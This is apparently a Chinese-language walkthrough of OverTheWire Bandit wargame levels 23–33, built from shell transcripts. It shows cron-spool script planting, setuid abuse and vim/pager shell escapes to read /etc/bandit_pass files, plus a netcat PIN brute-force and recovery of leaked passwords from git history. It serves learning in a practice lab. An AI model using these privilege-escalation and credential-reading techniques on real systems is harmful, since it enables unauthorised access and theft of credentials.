http://overthewire.org/wargames/bandit 程序员的小游戏
After all this git stuff its time for another escape. Good luck!
>>> $0
$ whoami
bandit33
$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee
$0相当于执行了sh(看开头是一个$可以得出是sh而非bash);whoami发现是bandit33,那么直接看密码就行了;bandit31@bandit:~$ mktemp -d
/tmp/tmp.UHFbV1v7DX
bandit31@bandit:~$ cd /tmp/tmp.UHFbV1v7DX
bandit31@bandit:/tmp/tmp.UHFbV1v7DX$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
remote: Counting objects: 4, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
bandit31@bandit:/tmp/tmp.UHFbV1v7DX$ cd repo/
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ ls
README.md
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ cat README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ echo 'May I come in?' > key.txt
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git add -A
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
nothing to commit, working tree clean
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ cat .gitignore
*.txt
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ :>.gitignore
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git checkout -- <file>..." to discard changes in working directory)
modified: .gitignore
Untracked files:
(use "git add <file>..." to include in what will be committed)
key.txt
no changes added to commit (use "git add" and/or "git commit -a")
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git add -A
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git commit -m 'Try to resolve it.'
[master e515574] Try to resolve it.
2 files changed, 1 insertion(+), 1 deletion(-)
create mode 100644 key.txt
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git push
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Counting objects: 4, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (4/4), 339 bytes | 0 bytes/s, done.
Total 4 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'
git工具使用add将所有工作区改动存储到暂存区;commit命令将暂存区内容存储到索引区;push命令将本地差异内容提交到远端;.gitignore文件,用于正则匹配不被git察觉到文件;There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo. The password for the user bandit30-git is the same as for the user bandit30.
Clone the repository and find the password for the next level.
bandit30@bandit:~$ mktemp -d
/tmp/tmp.UkNUXze0ar
bandit30@bandit:~$ cd /tmp/tmp.UkNUXze0ar
bandit30@bandit:/tmp/tmp.UkNUXze0ar$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit30/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit30/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit30-git@localhost's password:
remote: Counting objects: 4, done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
bandit30@bandit:/tmp/tmp.UkNUXze0ar$ cd repo/
bandit30@bandit:/tmp/tmp.UkNUXze0ar/repo$ ls
README.md
bandit30@bandit:/tmp/tmp.UkNUXze0ar/repo$ git tag
secret
bandit30@bandit:/tmp/tmp.UkNUXze0ar/repo$ git show secret
47e603bb428404d265f59c42920d81e5
git tagThere is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo. The password for the user bandit29-git is the same as for the user bandit29.
Clone the repository and find the password for the next level.
bandit29@bandit:~$ mktemp -d
/tmp/tmp.5vEfTyPY8r
bandit29@bandit:~$ cd /tmp/tmp.5vEfTyPY8r
bandit29@bandit:/tmp/tmp.5vEfTyPY8r$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit29/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit29-git@localhost's password:
remote: Counting objects: 16, done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.
bandit29@bandit:/tmp/tmp.5vEfTyPY8r$ cd repo/
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git log
commit 84abedc104bbc0c65cb9eb74eb1d3057753e70f8
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200
fix username
commit 9b19e7d8c1aadf4edcc5b15ba8107329ad6c5650
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200
initial commit of README.md
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git tag
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git branch
* master
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git branch -r
origin/HEAD -> origin/master
origin/dev
origin/master
origin/sploits-dev
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git log
commit 33ce2e95d9c5d6fb0a40e5ee9a2926903646b4e3
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200
add data needed for development
commit a8af722fccd4206fc3780bd3ede35b2c03886d9b
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200
add gif2ascii
commit 84abedc104bbc0c65cb9eb74eb1d3057753e70f8
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200
fix username
commit 9b19e7d8c1aadf4edcc5b15ba8107329ad6c5650
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:41 2018 +0200
initial commit of README.md
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ ls
code README.md
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ cat code/gif2ascii.py
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf
git命令存在多个分支branch,分支只是历史树上的一个游标;There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo. The password for the user bandit28-git is the same as for the user bandit28.
Clone the repository and find the password for the next level.
bandit28@bandit:~$ mktemp -d
/tmp/tmp.0HXHG7V3Lt
bandit28@bandit:~$ cd /tmp/tmp.0HXHG7V3Lt
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit28/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit28-git@localhost's password:
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt$ cd repo/
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ ls
README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ git log
commit 073c27c130e6ee407e12faad1dd3848a110c4f95
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200
fix info leak
commit 186a1038cc54d1358d42d468cdc8e3cc28a93fcb
Author: Morla Porla <morla@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200
add missing data
commit b67405defc6ef44210c53345fc953e6a21338cc7
Author: Ben Dover <noone@overthewire.org>
Date: Tue Oct 16 14:00:39 2018 +0200
initial commit of README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ git checkout b67405defc6ef44210c53345fc953e6a21338cc7
Note: checking out 'b67405defc6ef44210c53345fc953e6a21338cc7'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:
git checkout -b <new-branch-name>
HEAD is now at b67405d... initial commit of README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ ls
README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: <TBD>
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ git checkout 186a1038cc54d1358d42d468cdc8e3cc28a93fcb
Previous HEAD position was b67405d... initial commit of README.md
HEAD is now at 186a103... add missing data
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: bbc96594b4e001778eee9975372716b2
git作为版本追踪工具,查看历史log;checkout)到某个SHA历史点;There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo. The password for the user bandit27-git is the same as for the user bandit27.
Clone the repository and find the password for the next level.
bandit27@bandit:~$ mktemp -d
/tmp/tmp.RG0BBbh379
bandit27@bandit:~$ cd /tmp/tmp.RG0BBbh379
bandit27@bandit:/tmp/tmp.RG0BBbh379$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit27/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit27-git@localhost's password:
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/tmp.RG0BBbh379$ cd repo/
bandit27@bandit:/tmp/tmp.RG0BBbh379/repo$ ls
README
bandit27@bandit:/tmp/tmp.RG0BBbh379/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
git版本追踪工具基本命令clone;Good job getting a shell! Now hurry and grab the password for bandit27!
bandit26@bandit:~$ ls -l bandit27-do
-rwsr-x--- 1 bandit27 bandit26 7296 Oct 16 2018 bandit27-do
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
ls -l发现可执行文件bandit27-do设置了setuid;Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
使用ssh -i登陆bandit24发现直接退出,但是在退出前打印了很多内容。
这个时候,把终端高度缩小到只有几行(不能完全打印登陆内容),再次登陆,会发现输出信息不完全,并且没有迅速退出。
此时,直接按v进入VIM,就保存住了bandit26的登陆。
使用VIM命令模式,打开bandit26的密码文件:e /etc/bandit_pas/bandit26。
得到密码:5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
不过依旧在VIM里,无法做什么事情(一些环境变量都没有,无法执行系统命令)。我们设置下变量set shell=/bin/bash,然后再执行shell,就成功使用bash了。
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
bandit24@bandit:~$ :>/tmp/tmp.1YN5hffeea
bandit24@bandit:~$ for i in {0000..9999}
> do
> echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> /tmp/tmp.1YN5hffeea
> done
bandit24@bandit:~$ nc localhost 30002 < /tmp/tmp.1YN5hffeea
...
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
i in {0000..9999},从0000到9999,在前面拼上bandit24密码输入到文件中;nc从文件中读入传输到本地端口30002;A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
bandit23@bandit:~$ ls -l /etc/cron.d/
total 12
-rw-r--r-- 1 root root 120 Oct 16 2018 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 16 2018 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 16 2018 cronjob_bandit24
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
阅读shell,可以看出,bandit24会去执行/var/spool/bandit24下所有文件,所以我们要做一个bandit24可执行文件,把bandit24密码写入/tmp/下的一个都可读文件。
bandit23@bandit:~$ clear
bandit23@bandit:~$ mktemp
/tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ mktemp
/tmp/tmp.HsO4hET86S
bandit23@bandit:~$ vim /tmp/tmp.HsO4hET86S
...
bandit23@bandit:~$ cat /tmp/tmp.HsO4hET86S
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ chmod +rx /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ ls -l /tmp/tmp.HsO4hET86S
-rwxr-xr-x 1 bandit23 root 65 Sep 10 16:43 /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ chmod 666 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ ls -l /tmp/tmp.Mcx9oNLd3Q
-rw-rw-rw- 1 bandit23 root 0 Sep 10 16:42 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ cp /tmp/tmp.HsO4hET86S /var/spool/bandit24/
... wait
bandit23@bandit:~$ cat /tmp/tmp.Mcx9oNLd3Q
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ